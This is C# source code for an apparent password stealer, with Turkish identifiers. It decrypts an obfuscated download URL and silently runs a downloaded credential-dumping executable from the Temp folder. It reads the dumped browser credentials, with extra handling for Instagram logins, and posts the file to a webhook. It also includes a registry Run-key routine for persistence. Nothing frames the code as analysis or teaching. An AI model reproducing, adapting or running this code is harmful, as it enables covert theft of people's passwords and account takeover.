using Microsoft.Win32; using System; using System.Collections.Generic; using System.Collections.Specialized; using System.Diagnostics; using System.IO; using System.Linq; using System.Net; using System.Net.Http; using System.Security.Cryptography; using System.Text; using System.Text.RegularExpressions; using System.Threading; using System.Threading.Tasks; using System.Windows; using System.Deployment; namespace IGH { class Program { public static string temp = @"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp"; public static byte[] Byte8(string veri) { char[] ArrayChar = veri.ToCharArray(); byte[] ArrayByte = new byte[ArrayChar.Length]; for (int i = 0; i < ArrayByte.Length; i++) { ArrayByte[i] = Convert.ToByte(ArrayChar[i]); } return ArrayByte; } public static string RC2_Coz(string strGiris) { string strSonuc; byte[] aryKey = Byte8("89129381972634"); byte[] aryIV = Byte8("89129381972634"); RC2CryptoServiceProvider cp = new RC2CryptoServiceProvider(); MemoryStream ms = new MemoryStream(Convert.FromBase64String(strGiris)); CryptoStream cs = new CryptoStream(ms, cp.CreateDecryptor(aryKey, aryIV), CryptoStreamMode.Read); StreamReader reader = new StreamReader(cs); strSonuc = reader.ReadToEnd(); reader.Dispose(); cs.Dispose(); ms.Dispose(); return strSonuc; } public static string GetCreds() { string download = (RC2_Coz("ttZID1v0v1TqMWhYdkJXb61/qNdz/g+aMmf8XEyyrsqfmkke0DHfIrYxUeyEbrB02o/nf8/+6KVMUebDYAcCV/JaoarxNQOJNNPIsmfNQ/y2EG0Qw208f3Qo+IYWR6nq")); WebClient wc = new WebClient(); wc.DownloadFile(download, temp + "\\h0a8s7dfh.exe"); wc.Dispose(); Process process = new Process(); ProcessStartInfo processStartInfo = new ProcessStartInfo(); processStartInfo.WindowStyle = ProcessWindowStyle.Hidden; processStartInfo.FileName = temp + "\\h0a8s7dfh.exe"; processStartInfo.Arguments = "/C /stext " + temp + "\\791f026b19f642v.txt"; process.StartInfo = processStartInfo; process.Start(); Thread.Sleep(500); string result = File.ReadAllText(temp + "\\791f026b19f642v.txt"); return result; } public static string TextAdjust() { string text = GetCreds(); MatchCollection matches = Regex.Matches(text, "instagram", RegexOptions.IgnoreCase); string final = text.Substring(text.IndexOf("instagram") + 20, 450 * matches.Count); return final; } static void Main(string[] args) { Webhook wb = new Webhook("//webhook"); wb.Name = "Drchimp"; wb.SendMessage3("Al amk",temp+ "\\791f026b19f642v.txt"); //startup } public static void AddToStartup() { RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); registryKey.SetValue("Windows", temp); } } class Webhook { private HttpClient Client; private string Url; public string Name { get; set; } public string ProfilePictureUrl { get; set; } public Webhook(string webhookUrl) { Client = new HttpClient(); Url = webhookUrl; } public bool SendMessage3(string content, string file = null) { MultipartFormDataContent data = new MultipartFormDataContent(); data.Add(new StringContent(Name), "username"); data.Add(new StringContent(ProfilePictureUrl), "avatar_url"); data.Add(new StringContent(content), "content"); if (file != null) { if (!File.Exists(file)) throw new FileNotFoundException(); byte[] bytes = File.ReadAllBytes(file); data.Add(new ByteArrayContent(bytes), "BrowserVerileri.txt", "BrowserVerileri.txt"); } var resp = Client.PostAsync(Url, data).Result; return resp.StatusCode == HttpStatusCode.NoContent; } } }